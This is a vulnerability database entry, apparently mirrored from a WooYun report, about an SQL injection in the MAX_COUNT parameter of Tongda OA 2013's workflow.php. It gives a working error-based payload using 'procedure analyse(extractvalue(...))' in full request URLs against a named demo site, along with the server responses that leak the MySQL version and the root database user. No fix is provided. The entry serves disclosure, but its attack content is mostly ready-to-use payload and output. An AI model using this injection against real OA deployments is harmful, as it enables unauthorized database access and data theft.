通达oa2013集团版技巧性SQL注入

Basic Fields

SSV ID:: SSV-96107

Find Time:: 2015-03-25

Submit Time:: 2015-03-25

Level:

Category:: 其他类型

Component:: Tongda OA

Author:: 路人甲

Submitter:: Knownsec

CVE-ID：: Add

CNNVD-ID：: Add

CNVD-ID：: Add

ZoomEye Dork：: Add

Source

http://wooyun.org/bugs/wooyun-2015-0103304

Detail

Contributor Knownsec Got 0KB

### 简要描述：又是通达 ### 详细说明：官网demo登录试用: http://www.day900.com 注入点: http://www.day900.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random 加单引号后: 请联系管理员错误#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 SQL语句: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15\' 文件：/general/mytable/intel_view/workflow.php 注入点在max_count,但是在limit处，好几次都不成功终于：上payload: 15 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); http://www.day900.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random 成功返回version: 错误#1105: XPATH syntax error: ':5.5.25-enterprise-commercial-ad' SQL语句: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1) 文件：/general/mytable/intel_view/workflow.php 同样也可以返回user 错误#1105: XPATH syntax error: ':root@127.0.0.1' SQL语句: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15 procedure analyse(extractvalue(rand(),concat(0x3a,user())),1) 文件：/general/mytable/intel_view/workflow.php root@127.0.0.1 ### 漏洞证明：见详细说明

have 0 exchange

PoC

Unavailable PoC

Reference Linking

http://wooyun.org/bugs/wooyun-2015-0103304

Solutions

Temp Solutions

Unavailable Temp Solutions

Official Solution

Unavailable Official solution

Defense Solutions

Unavailable Defense Solutions

※Any content provided by this site, only to learn the code and services, not for illegal purposes

Basic Fields

Source

Detail

PoC

Reference Linking

Solutions

Timeline

Related Vuls

Need to bind phone before comment. Bind Now

Unavailable Comments

通达oa2013集团版技巧性SQL注入

Basic Fields

Source

Detail

PoC

Reference Linking

Solutions

Timeline

Related Vuls

Need to bind phone before comment. Bind Now

Unavailable Comments

Hello,

Hello,